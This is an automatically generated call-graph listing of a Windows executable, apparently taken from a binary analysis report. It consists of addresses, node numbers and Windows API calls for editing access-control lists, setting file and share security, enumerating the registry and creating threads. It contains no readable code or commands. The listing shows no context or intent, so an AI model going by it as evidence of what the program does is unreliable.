_invalid_parameter_noinfo_noreturn 31 API calls 41910->41912 41916 7ff68684e436 41911->41916 41912->41918 42264 7ff68683bf60 45 API calls 4 library calls 41913->42264 42262 7ff68683bf60 45 API calls 4 library calls 41914->42262 41921 7ff68684e4ae 41915->41921 41929 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41916->41929 41918->41887 41924 7ff68684cda9 41919->41924 42296 7ff686833e30 33 API calls 41921->42296 41922 7ff68684d0de 41933 7ff68684d1a2 41922->41933 41934 7ff68684d110 GetAclInformation 41922->41934 42015 7ff68684d272 41922->42015 41923 7ff68684cae1 41923->41921 41939 7ff68682aa20 35 API calls 41923->41939 42266 7ff6868350c0 73 API calls 3 library calls 41924->42266 41925 7ff68684c854 41925->41872 41938 7ff68682aa20 35 API calls 41925->41938 41927 7ff68684cf6c GetAclInformation 41936 7ff68684cf8b GetLastError 41927->41936 41952 7ff68684cf9f 41927->41952 41928 7ff68684ce3c 41928->41922 41949 7ff68684d02b GetAclInformation 41928->41949 41932 7ff68684e43c 41929->41932 41931 7ff68684e4b4 41943 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41931->41943 41947 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41932->41947 41948 7ff68684d1d3 GetAclInformation 41933->41948 41933->42015 41941 7ff68684d12c GetLastError 41934->41941 41970 7ff68684d140 41934->41970 41935 7ff68684cdba 41945 7ff686829520 35 API calls 41935->41945 41935->42012 41937 7ff68684e354 LocalFree LocalFree 41936->41937 41955 7ff68684e377 ctype 41937->41955 41944 7ff68684c8a6 41938->41944 41950 7ff68684cb33 41939->41950 41940 7ff68684d2b8 GetAclInformation 41951 7ff68684d2d7 GetLastError 41940->41951 41983 7ff68684d2eb 41940->41983 41941->41937 41942 7ff68684cfc0 GetAce 41942->41936 41942->41952 41953 7ff68684e4ba 41943->41953 41954 7ff68682ac70 35 API calls 41944->41954 41945->42012 41946 7ff68684d38a GetAclInformation 41956 7ff68684d3a8 GetLastError 41946->41956 41987 7ff68684d3bc 41946->41987 41957 7ff68684e442 41947->41957 41958 7ff68684d1ef GetLastError 41948->41958 42014 7ff68684d203 41948->42014 41959 7ff68684d047 GetLastError 41949->41959 42016 7ff68684d06f 41949->42016 41960 7ff68682ac70 35 API calls 41950->41960 41951->41937 41952->41928 41952->41942 41963 7ff68684cfdf DeleteAce 41952->41963 41973 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41953->41973 41964 7ff68684c8c0 41954->41964 42291 7ff686856970 33 API calls 3 library calls 41955->42291 41956->41937 41975 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41957->41975 41958->41937 41959->41937 41966 7ff68684cb4d 41960->41966 41961 7ff68684d44c 41968 7ff68684d47e 41961->41968 42044 7ff68684c937 ctype 41961->42044 42270 7ff686859d50 69 API calls 3 library calls 41961->42270 41962 7ff68684d160 GetAce 41962->41936 41962->41970 41963->41952 41972 7ff68684d05b GetLastError 41963->41972 42263 7ff68683a1f0 33 API calls 41964->42263 42265 7ff68683a1f0 33 API calls 41966->42265 41967 7ff68684d382 41967->41961 42269 7ff686859d50 69 API calls 3 library calls 41967->42269 41982 7ff68684d59d ctype 41968->41982 41990 7ff68684d4b2 41968->41990 41968->42044 42271 7ff686859830 50 API calls 2 library calls 41968->42271 41969 7ff68684d300 GetAce 41969->41936 41969->41983 41970->41933 41970->41962 41971 7ff68684d183 DeleteAce 41970->41971 41971->41970 41971->41972 41972->41937 41984 7ff68684e4c0 41973->41984 41975->41910 41976 7ff68684e397 42292 7ff686856970 33 API calls 3 library calls 41976->42292 41977 7ff68684d3d0 GetAce 41977->41936 41977->41987 41978 7ff68684d220 GetAce 41978->41936 41978->42014 41979 7ff68684d090 GetAce 41979->41936 41979->42016 41993 7ff68684d5f7 41982->41993 42023 7ff68684d7ac ctype 41982->42023 42276 7ff686858360 156 API calls 3 library calls 41982->42276 41983->41969 41991 7ff68684d32b DeleteAce 41983->41991 41992 7ff68684d2ae 41983->41992 42003 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41984->42003 41987->41967 41987->41977 41996 7ff68684d3fb DeleteAce 41987->41996 41990->41982 42001 7ff68684d4e3 41990->42001 41990->42044 42272 7ff686859830 50 API calls 2 library calls 41990->42272 41991->41972 41991->41983 41992->41946 41992->41967 41993->42023 41993->42044 42055 7ff68684d628 41993->42055 42277 7ff686858360 156 API calls 3 library calls 41993->42277 41995 7ff68684e3a1 41995->41957 41995->42005 41996->41972 41996->41987 42001->41982 42001->42044 42273 7ff686859b10 13 API calls ctype 42001->42273 42007 7ff68684e4c6 42003->42007 42004 7ff68684d942 SetEntriesInAclW 42008 7ff68684d964 42004->42008 42009 7ff68684dc10 SetEntriesInAclW 42004->42009 42005->41892 42022 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42007->42022 42008->42044 42280 7ff68683bf60 45 API calls 4 library calls 42008->42280 42017 7ff68684dc36 42009->42017 42018 7ff68684dee2 42009->42018 42010 7ff68684d253 DeleteAce 42010->41972 42010->42014 42011 7ff68684d0c3 DeleteAce 42011->41972 42011->42016 42012->41901 42012->41922 42012->41927 42012->41928 42014->41978 42014->42010 42014->42015 42268 7ff6868539c0 13 API calls _handle_error 42014->42268 42015->41940 42015->41992 42016->41922 42016->41979 42016->42011 42267 7ff6868539c0 13 API calls _handle_error 42016->42267 42017->42044 42282 7ff68683bf60 45 API calls 4 library calls 42017->42282 42019 7ff68684dfa4 42018->42019 42020 7ff68684def1 42018->42020 42033 7ff68684dfd8 42019->42033 42034 7ff68684dfc3 IsValidSid 42019->42034 42086 7ff68684df9f 42019->42086 42025 7ff68684df1a 42020->42025 42026 7ff68684df05 IsValidSid 42020->42026 42028 7ff68684e4cc 42022->42028 42023->42004 42023->42044 42038 7ff68684df4b 42025->42038 42039 7ff68684df36 IsValidSid 42025->42039 42026->42025 42032 7ff68684df12 42026->42032 42027 7ff68684d527 42027->42044 42047 7ff68684d541 IsValidSid 42027->42047 42061 7ff68684d554 ctype 42027->42061 42040 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42028->42040 42029 7ff68684d739 42045 7ff68684d74c IsValidSid 42029->42045 42046 7ff68684d75f ctype 42029->42046 42030 7ff68684d97e 42036 7ff68684e4d2 42030->42036 42056 7ff68682aa20 35 API calls 42030->42056 42284 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42032->42284 42052 7ff68684e009 42033->42052 42053 7ff68684dff4 IsValidSid 42033->42053 42034->42033 42042 7ff68684dfd0 42034->42042 42035 7ff68684dc50 42043 7ff68684e4f0 42035->42043 42063 7ff68682aa20 35 API calls 42035->42063 42297 7ff686833e30 33 API calls 42036->42297 42062 7ff686829520 35 API calls 42038->42062 42039->42038 42048 7ff68684df43 42039->42048 42040->42036 42287 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42042->42287 42298 7ff686833e30 33 API calls 42043->42298 42044->41875 42044->41881 42044->41888 42044->41899 42044->41906 42044->41931 42044->41937 42044->41953 42044->41984 42044->42007 42044->42028 42045->42046 42057 7ff68684d756 42045->42057 42046->42023 42058 7ff68684d799 IsValidSid 42046->42058 42059 7ff68684d54b 42047->42059 42047->42061 42285 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42048->42285 42077 7ff686829520 35 API calls 42052->42077 42053->42052 42065 7ff68684e001 42053->42065 42055->42023 42055->42029 42055->42044 42067 7ff686859200 118 API calls 42055->42067 42068 7ff68684d9d2 42056->42068 42278 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42057->42278 42058->42023 42070 7ff68684d7a3 42058->42070 42274 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42059->42274 42061->41982 42074 7ff68684d58a IsValidSid 42061->42074 42073 7ff68684df74 42062->42073 42075 7ff68684dca4 42063->42075 42288 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42065->42288 42066 7ff68684e09e 42078 7ff68684e50e 42066->42078 42093 7ff68682aa20 35 API calls 42066->42093 42067->42055 42079 7ff68682ac70 35 API calls 42068->42079 42279 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42070->42279 42286 7ff686858010 37 API calls 3 library calls 42073->42286 42074->41982 42083 7ff68684d594 42074->42083 42084 7ff68682ac70 35 API calls 42075->42084 42077->42086 42299 7ff686833e30 33 API calls 42078->42299 42088 7ff68684d9ea 42079->42088 42275 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42083->42275 42090 7ff68684dcbc 42084->42090 42086->42044 42289 7ff68683bf60 45 API calls 4 library calls 42086->42289 42281 7ff68683a1f0 33 API calls 42088->42281 42283 7ff68683a1f0 33 API calls 42090->42283 42097 7ff68684e0f0 42093->42097 42103 7ff68682ac70 35 API calls 42097->42103 42108 7ff68684e10a 42103->42108 42290 7ff68683a1f0 33 API calls 42108->42290 42128->41897 42129->41737 42130->41744 42131->41748 42132->41665 42133->41675 42134->41666 42135->41687 42136->41690 42137->41716 42138->41718 42139->41722 42140->41727 42141->41732 42142->41598 42143->41604 42144->41611 42145->41618 42146->41624 42151 7ff6868621df 42147->42151 42148 7ff6868621f8 42148->41640 42150 7ff68686220a Concurrency::cancel_current_task 42150->42151 42151->42147 42151->42148 42151->42150 42303 7ff6868724d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 42151->42303 42304 7ff686860ff0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 42151->42304 42153->41671 42154->41673 42156 7ff68682aa72 42155->42156 42159 7ff68682aad9 ctype 42155->42159 42157 7ff68682aa87 42156->42157 42158 7ff68682ab53 Concurrency::cancel_current_task 42156->42158 42160 7ff68682aae7 42156->42160 42157->42158 42161 7ff6868621d4 std::_Facet_Register 5 API calls 42157->42161 42159->41699 42160->42159 42163 7ff6868621d4 std::_Facet_Register 5 API calls 42160->42163 42162 7ff68682aad4 42161->42162 42162->42159 42164 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42162->42164 42163->42159 42165 7ff68682ab52 42164->42165 42165->42158 42167 7ff68682accf 42166->42167 42170 7ff68682ac8c ctype 42166->42170 42305 7ff68682bff0 35 API calls 3 library calls 42167->42305 42169 7ff68682ace2 42169->41699 42170->41699 42172 7ff686829520 35 API calls 42171->42172 42173 7ff68684b76e 42172->42173 42216 7ff68684bc40 240 API calls 42173->42216 42174 7ff68684b779 42177 7ff68684a350 250 API calls 42174->42177 42213 7ff68684bb51 ctype 42174->42213 42176 7ff68684b986 42179 7ff68684b9be ctype 42176->42179 42209 7ff68684bc26 42176->42209 42178 7ff68684b7ad 42177->42178 42181 7ff6868621d4 std::_Facet_Register 5 API calls 42178->42181 42178->42213 42180 7ff686862180 _handle_error 8 API calls 42179->42180 42182 7ff68684bc06 42180->42182 42184 7ff68684b7c9 memcpy_s 42181->42184 42182->41699 42183 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42185 7ff68684bc2c 42183->42185 42186 7ff68684b7eb RegEnumKeyExW 42184->42186 42187 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42185->42187 42211 7ff68684b81f ctype 42186->42211 42189 7ff68684bc32 42187->42189 42188 7ff68684b920 42190 7ff68684b9df 42188->42190 42191 7ff68684b930 42188->42191 42192 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42189->42192 42195 7ff68684b9eb RegCloseKey 42190->42195 42215 7ff68684b9f1 ctype 42190->42215 42193 7ff68684b93c 42191->42193 42194 7ff68684b935 RegCloseKey 42191->42194 42196 7ff68684bc38 42192->42196 42198 7ff68684b971 ctype 42193->42198 42204 7ff68684bc21 42193->42204 42194->42193 42195->42215 42310 7ff686833e30 33 API calls 42196->42310 42197 7ff686833f80 35 API calls 42197->42211 42307 7ff686829720 31 API calls 2 library calls 42198->42307 42199 7ff68684bb05 42200 7ff68684bb3c ctype 42199->42200 42199->42204 42308 7ff686829720 31 API calls 2 library calls 42200->42308 42206 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42204->42206 42206->42209 42208 7ff68682aa20 35 API calls 42208->42215 42209->42183 42210 7ff68684b8e6 RegEnumKeyExW 42210->42211 42211->42185 42211->42188 42211->42197 42211->42210 42306 7ff686830360 35 API calls 3 library calls 42211->42306 42212 7ff68682ac70 35 API calls 42212->42215 42213->42179 42213->42209 42309 7ff686829720 31 API calls 2 library calls 42213->42309 42214 7ff68684b710 250 API calls 42214->42215 42215->42189 42215->42196 42215->42199 42215->42208 42215->42212 42215->42214 42216->42174 42217->41686 42218->41673 42221 7ff68683c603 ctype 42220->42221 42222 7ff686862180 _handle_error 8 API calls 42221->42222 42223 7ff68683c6f2 42222->42223 42223->41808 42225 7ff68686126b 42224->42225 42226 7ff686861270 42224->42226 42234 7ff68686f2d4 6 API calls std::_Locinfo::_Locinfo_ctor 42225->42234 42226->41812 42229 7ff6868612df LeaveCriticalSection 42228->42229 42231 7ff6868612e8 42228->42231 42231->41817 42232->41814 42233->41818 42236 7ff686860c18 13 API calls 42235->42236 42237 7ff686844487 42236->42237 42249 7ff6868444da ctype 42237->42249 42300 7ff68682c870 70 API calls 4 library calls 42237->42300 42239 7ff6868446df 42240 7ff686844716 ctype 42239->42240 42254 7ff6868447fd 42239->42254 42242 7ff686862180 _handle_error 8 API calls 42240->42242 42241 7ff686860c18 13 API calls 42241->42249 42243 7ff68684473c 42242->42243 42243->41840 42243->41848 42243->41883 42244 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42245 7ff686844803 42244->42245 42246 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42245->42246 42248 7ff686844809 42246->42248 42249->42239 42249->42241 42249->42245 42250 7ff68684475d ctype 42249->42250 42301 7ff68682c870 70 API calls 4 library calls 42249->42301 42302 7ff686839ec0 35 API calls 3 library calls 42249->42302 42250->42240 42250->42245 42252 7ff6868447f8 42250->42252 42253 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42252->42253 42253->42254 42254->42244 42255->41825 42256->41829 42257->41880 42258->41896 42259->41903 42260->41879 42261->41883 42262->41925 42264->41923 42266->41935 42267->42016 42268->42014 42269->41961 42270->41968 42271->41990 42272->42001 42273->42027 42274->42061 42275->41982 42276->41993 42277->42055 42278->42046 42279->42023 42280->42030 42282->42035 42284->42025 42285->42038 42286->42086 42287->42033 42288->42052 42289->42066 42291->41976 42292->41995 42300->42237 42301->42249 42302->42249 42303->42151 42305->42169 42306->42211 42307->42176 42308->42213 42309->42176 42312->41775 42313->41792 42315->41797 42318 7ff686821649 EnterCriticalSection 42319 7ff686821664 LeaveCriticalSection 42318->42319 42320 7ff686821699 EnterCriticalSection 42319->42320 42321 7ff6868216bd 42320->42321 42322 7ff6868216b0 CloseHandle 42320->42322 42323 7ff6868216d6 LeaveCriticalSection 42321->42323 42324 7ff6868216c9 DeregisterEventSource 42321->42324 42322->42321 42329 7ff68683f350 64 API calls 2 library calls 42323->42329 42324->42323 42326 7ff6868216ea 42327 7ff686862180 _handle_error 8 API calls 42326->42327 42328 7ff6868216fc 42327->42328 42329->42326 42330 7ff686842dcb 42331 7ff686842dd9 42330->42331 42332 7ff68684346c 42330->42332 42333 7ff686842de7 42331->42333 42334 7ff686843481 42331->42334 42487 7ff686864c18 RtlPcToFileHeader RaiseException 42332->42487 42336 7ff686842e03 42333->42336 42475 7ff686847b10 155 API calls 5 library calls 42333->42475 42488 7ff686864c18 RtlPcToFileHeader RaiseException 42334->42488 42340 7ff686842e4f 42336->42340 42341 7ff686842e34 42336->42341 42354 7ff686842e90 42336->42354 42339 7ff68684349a 42489 7ff686864c18 RtlPcToFileHeader RaiseException 42339->42489 42345 7ff686842e6f 42340->42345 42346 7ff686842e54 42340->42346 42344 7ff686829520 35 API calls 42341->42344 42342 7ff686842df5 42342->42336 42342->42339 42348 7ff686842e39 42344->42348 42350 7ff686829520 35 API calls 42345->42350 42349 7ff686829520 35 API calls 42346->42349 42347 7ff6868434af 42490 7ff686864c18 RtlPcToFileHeader RaiseException 42347->42490 42476 7ff6868496d0 79 API calls 3 library calls 42348->42476 42355 7ff686842e59 42349->42355 42356 7ff686842e74 42350->42356 42352 7ff68684331f 42361 7ff686833f80 35 API calls 42352->42361 42358 7ff6868431dc 42354->42358 42369 7ff686842f4f 42354->42369 42477 7ff6868541a0 35 API calls 2 library calls 42354->42477 42362 7ff68684b710 254 API calls 42355->42362 42363 7ff68684bc40 240 API calls 42356->42363 42357 7ff6868434c4 42491 7ff686864c18 RtlPcToFileHeader RaiseException 42357->42491 42358->42352 42365 7ff68684320e 42358->42365 42482 7ff68687de6c 64 API calls 2 library calls 42358->42482 42359 7ff686842e4b 42366 7ff686842e6b 42359->42366 42368 7ff686843339 42361->42368 42362->42366 42363->42366 42372 7ff686829520 35 API calls 42365->42372 42366->42347 42366->42354 42367 7ff686842f27 42478 7ff686855f60 40 API calls 42367->42478 42377 7ff686833f80 35 API calls 42368->42377 42374 7ff686842fe1 42369->42374 42375 7ff686843054 42369->42375 42370 7ff6868434da 42378 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42370->42378 42376 7ff686843222 42372->42376 42379 7ff68684300e 42374->42379 42380 7ff686842ff3 42374->42380 42381 7ff686833f80 35 API calls 42375->42381 42382 7ff686843271 ctype 42376->42382 42395 7ff6868434e6 42376->42395 42383 7ff686843389 42377->42383 42384 7ff6868434e0 42378->42384 42387 7ff68684302e 42379->42387 42388 7ff686843013 42379->42388 42385 7ff686829520 35 API calls 42380->42385 42386 7ff68684308a 42381->42386 42389 7ff686843287 42382->42389 42483 7ff68685e1c0 94 API calls 4 library calls 42382->42483 42416 7ff686843502 42383->42416 42417 7ff6868433ee ctype 42383->42417 42400 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42384->42400 42393 7ff686842ff8 42385->42393 42394 7ff686833f80 35 API calls 42386->42394 42390 7ff686829520 35 API calls 42387->42390 42396 7ff686829520 35 API calls 42388->42396 42391 7ff6868432ce 42389->42391 42392 7ff6868432b3 42389->42392 42414 7ff68684328b 42389->42414 42398 7ff686843033 42390->42398 42401 7ff6868432ee 42391->42401 42402 7ff6868432d3 42391->42402 42399 7ff686829520 35 API calls 42392->42399 42479 7ff6868496d0 79 API calls 3 library calls 42393->42479 42415 7ff6868430c9 42394->42415 42404 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42395->42404 42405 7ff686843018 42396->42405 42406 7ff68684bc40 240 API calls 42398->42406 42408 7ff6868432b8 42399->42408 42400->42395 42411 7ff686829520 35 API calls 42401->42411 42409 7ff686829520 35 API calls 42402->42409 42404->42414 42412 7ff68684b710 254 API calls 42405->42412 42413 7ff68684302a 42406->42413 42407 7ff686843437 ctype 42419 7ff686862180 _handle_error 8 API calls 42407->42419 42484 7ff6868496d0 79 API calls 3 library calls 42408->42484 42420 7ff6868432d8 42409->42420 42410 7ff68684300a 42410->42413 42421 7ff6868432f3 42411->42421 42412->42413 42413->42357 42434 7ff68684304f ctype 42413->42434 42492 7ff686864c18 RtlPcToFileHeader RaiseException 42414->42492 42415->42370 42424 7ff686843130 ctype 42415->42424 42425 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42416->42425 42417->42407 42426 7ff686843508 42417->42426 42428 7ff68684344f 42419->42428 42429 7ff68684b710 254 API calls 42420->42429 42485 7ff68684e530 178 API calls 5 library calls 42421->42485 42424->42384 42424->42434 42425->42426 42431 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42426->42431 42427 7ff6868432ca 42430 7ff6868432ea 42427->42430 42429->42430 42432 7ff686843310 42430->42432 42486 7ff68687de6c 64 API calls 2 library calls 42430->42486 42433 7ff68684350e 42431->42433 42432->42352 42432->42414 42439 7ff686833f80 35 API calls 42433->42439 42435 7ff6868431c8 42434->42435 42480 7ff686856010 41 API calls 2 library calls 42434->42480 42481 7ff6868540e0 31 API calls 2 library calls 42435->42481 42440 7ff686843584 42439->42440 42441 7ff686833f80 35 API calls 42440->42441 42442 7ff6868435b2 ctype 42441->42442 42443 7ff68684371c ctype 42442->42443 42444 7ff6868443e2 42442->42444 42447 7ff6868443dd 42442->42447 42448 7ff686862180 _handle_error 8 API calls 42443->42448 42445 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42444->42445 42446 7ff6868443e8 42445->42446 42451 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42446->42451 42450 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42447->42450 42449 7ff6868443c0 42448->42449 42450->42444 42452 7ff6868443ee 42451->42452 42453 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42452->42453 42454 7ff6868443f4 42453->42454 42455 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42454->42455 42456 7ff6868443fa 42455->42456 42457 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42456->42457 42458 7ff686844400 42457->42458 42459 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42458->42459 42460 7ff686844406 42459->42460 42461 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42460->42461 42462 7ff68684440c 42461->42462 42463 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42462->42463 42464 7ff686844412 42463->42464 42465 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42464->42465 42466 7ff686844418 42465->42466 42467 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42466->42467 42468 7ff68684441e 42467->42468 42469 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42468->42469 42470 7ff686844424 42469->42470 42471 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42470->42471 42472 7ff68684442a 42471->42472 42473 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42472->42473 42474 7ff686844430 42473->42474 42475->42342 42476->42359 42477->42367 42478->42369 42479->42410 42480->42435 42481->42358 42482->42365 42483->42389 42484->42427 42485->42430 42486->42432 42487->42334 42488->42339 42489->42347 42490->42357 42491->42370 42492->42416 42493 7ff68683cd0a 42523 7ff68683d0a0 EnterCriticalSection 42493->42523 42497 7ff68683cdcf ctype 42499 7ff68683cdf6 42497->42499 42500 7ff68683cddb 42497->42500 42498 7ff68683cd1a ctype 42498->42497 42501 7ff68683d084 42498->42501 42503 7ff686829520 35 API calls 42499->42503 42502 7ff686833f80 35 API calls 42500->42502 42504 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42501->42504 42522 7ff68683cdf1 ctype 42502->42522 42511 7ff68683ce03 ctype 42503->42511 42506 7ff68683d089 42504->42506 42505 7ff68683cf9c RegisterEventSourceW 42550 7ff68686e62c 42505->42550 42508 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42506->42508 42510 7ff68683d08f 42508->42510 42515 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42510->42515 42511->42506 42512 7ff68683cec4 ctype 42511->42512 42513 7ff686829520 35 API calls 42512->42513 42521 7ff68683ced6 ctype 42513->42521 42517 7ff68683d095 42515->42517 42516 7ff68683d03e LeaveCriticalSection 42519 7ff686862180 _handle_error 8 API calls 42516->42519 42518 7ff68683cfea ctype 42518->42516 42520 7ff68683d065 42519->42520 42521->42505 42521->42510 42521->42522 42522->42505 42524 7ff68683d0db 42523->42524 42527 7ff68683d186 42523->42527 42525 7ff68683d1ab LeaveCriticalSection 42524->42525 42528 7ff686834fc0 36 API calls 42524->42528 42526 7ff686862180 _handle_error 8 API calls 42525->42526 42530 7ff68683cd11 42526->42530 42531 7ff686833f80 35 API calls 42527->42531 42529 7ff68683d0f2 42528->42529 42532 7ff68683d123 42529->42532 42533 7ff68682ac70 35 API calls 42529->42533 42540 7ff686834fc0 42530->42540 42536 7ff68683d17f ctype 42531->42536 42534 7ff686833f80 35 API calls 42532->42534 42533->42532 42535 7ff68683d145 42534->42535 42535->42525 42535->42536 42537 7ff68683d1cc 42535->42537 42536->42525 42538 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42537->42538 42539 7ff68683d1d1 42538->42539 42541 7ff6868621d4 std::_Facet_Register 5 API calls 42540->42541 42542 7ff686834fec memcpy_s 42541->42542 42543 7ff686835010 GetModuleFileNameW 42542->42543 42544 7ff686835044 42543->42544 42547 7ff686835066 42543->42547 42546 7ff686833f80 35 API calls 42544->42546 42545 7ff686835093 ctype 42545->42498 42546->42547 42547->42545 42548 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42547->42548 42549 7ff6868350be 42548->42549 42551 7ff68686e65c 42550->42551 42552 7ff68686e645 42550->42552 42569 7ff68686e5cc 42551->42569 42576 7ff68686e1f8 14 API calls _Wcrtomb 42552->42576 42556 7ff68686e64a 42577 7ff6868688dc 31 API calls _invalid_parameter_noinfo 42556->42577 42557 7ff68686e66f CreateThread 42560 7ff68686e69f GetLastError 42557->42560 42562 7ff68686e6ac 42557->42562 42559 7ff68683cfd9 42559->42518 42568 7ff68686e1f8 14 API calls _Wcrtomb 42559->42568 42578 7ff68686e188 14 API calls 2 library calls 42560->42578 42562->42559 42563 7ff68686e6bc CloseHandle 42562->42563 42564 7ff68686e6c2 42562->42564 42563->42564 42565 7ff68686e6cb FreeLibrary 42564->42565 42566 7ff68686e6d1 42564->42566 42565->42566 42579 7ff686875054 42566->42579 42568->42518 42585 7ff686874fdc 42569->42585 42572 7ff686875054 __free_lconv_num 14 API calls 42573 7ff68686e5f8 42572->42573 42574 7ff68686e619 42573->42574 42575 7ff68686e5ff GetModuleHandleExW 42573->42575 42574->42557 42574->42562 42575->42574 42576->42556 42577->42559 42578->42562 42580 7ff686875059 HeapFree 42579->42580 42581 7ff686875089 __free_lconv_num 42579->42581 42580->42581 42582 7ff686875074 42580->42582 42581->42559 42594 7ff68686e1f8 14 API calls _Wcrtomb 42582->42594 42584 7ff686875079 GetLastError 42584->42581 42591 7ff686874fed _Tolower 42585->42591 42586 7ff68687503e 42593 7ff68686e1f8 14 API calls _Wcrtomb 42586->42593 42587 7ff686875022 HeapAlloc 42589 7ff68686e5ee 42587->42589 42587->42591 42589->42572 42591->42586 42591->42587 42592 7ff6868724d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 42591->42592 42592->42591 42593->42589 42594->42584 42595 7ff686872ff4 42596 7ff68687305b 42595->42596 42597 7ff686873011 GetModuleHandleW 42595->42597 42605 7ff686872eec 42596->42605 42597->42596 42603 7ff68687301e 42597->42603 42600 7ff68687309d 42602 7ff6868730af 42603->42596 42619 7ff6868730fc GetModuleHandleExW 42603->42619 42625 7ff68686f264 EnterCriticalSection 42605->42625 42607 7ff686872f08 42608 7ff686872f24 39 API calls 42607->42608 42609 7ff686872f11 42608->42609 42610 7ff68686f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 42609->42610 42611 7ff686872f19 42610->42611 42611->42600 42612 7ff6868730b0 42611->42612 42626 7ff68687aa24 42612->42626 42615 7ff6868730ea 42617 7ff6868730fc 3 API calls 42615->42617 42616 7ff6868730d9 GetCurrentProcess TerminateProcess 42616->42615 42618 7ff6868730f1 ExitProcess 42617->42618 42620 7ff686873122 GetProcAddress 42619->42620 42621 7ff686873141 42619->42621 42620->42621 42622 7ff686873139 42620->42622 42623 7ff68687314b FreeLibrary 42621->42623 42624 7ff686873151 42621->42624 42622->42621 42623->42624 42624->42596 42627 7ff68687aa42 42626->42627 42629 7ff6868730bd 42626->42629 42630 7ff686877b70 5 API calls try_get_function 42627->42630 42629->42615 42629->42616 42630->42629 42631 7ff686857715 42632 7ff68685771f 42631->42632 42633 7ff686857ef0 42631->42633 42635 7ff68685772c 42632->42635 42636 7ff6868579d1 42632->42636 42732 7ff686856970 33 API calls 3 library calls 42633->42732 42637 7ff686833f80 35 API calls 42635->42637 42638 7ff686857a48 42636->42638 42640 7ff686857bb6 42636->42640 42641 7ff6868579e3 42636->42641 42639 7ff686857759 42637->42639 42648 7ff686829520 35 API calls 42638->42648 42656 7ff686857a86 ctype 42638->42656 42642 7ff686833f80 35 API calls 42639->42642 42640->42638 42647 7ff68684a350 254 API calls 42640->42647 42643 7ff6868579ed 42641->42643 42644 7ff6868579f0 CreateFileW 42641->42644 42649 7ff686857790 42642->42649 42643->42644 42645 7ff686857a29 42644->42645 42646 7ff686857a35 GetLastError 42644->42646 42652 7ff686857c03 SetSecurityInfo 42645->42652 42646->42638 42657 7ff686857bdc 42647->42657 42653 7ff686857a66 42648->42653 42722 7ff6868342a0 58 API calls 3 library calls 42649->42722 42650 7ff68685765d ctype 42662 7ff6868576aa ctype 42650->42662 42677 7ff686857fe7 42650->42677 42651 7ff686857ef9 ctype 42651->42650 42658 7ff686857fdc 42651->42658 42667 7ff686857fe1 42651->42667 42712 7ff686858005 42651->42712 42652->42638 42666 7ff686857b3d 42652->42666 42724 7ff6868350c0 73 API calls 3 library calls 42653->42724 42654 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42660 7ff68685800b 42654->42660 42675 7ff686857af9 42656->42675 42689 7ff686857b33 42656->42689 42725 7ff686859fb0 16 API calls _handle_error 42656->42725 42657->42638 42657->42652 42661 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42658->42661 42661->42667 42686 7ff686862180 _handle_error 8 API calls 42662->42686 42664 7ff686857d05 42672 7ff686857ff9 42664->42672 42673 7ff686857d2b 42664->42673 42679 7ff686857b58 42666->42679 42680 7ff686857b4f CloseHandle 42666->42680 42668 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42667->42668 42668->42677 42669 7ff686857a75 42669->42656 42685 7ff686829520 35 API calls 42669->42685 42670 7ff686857e78 42670->42666 42696 7ff686857ec8 NetShareSetInfo 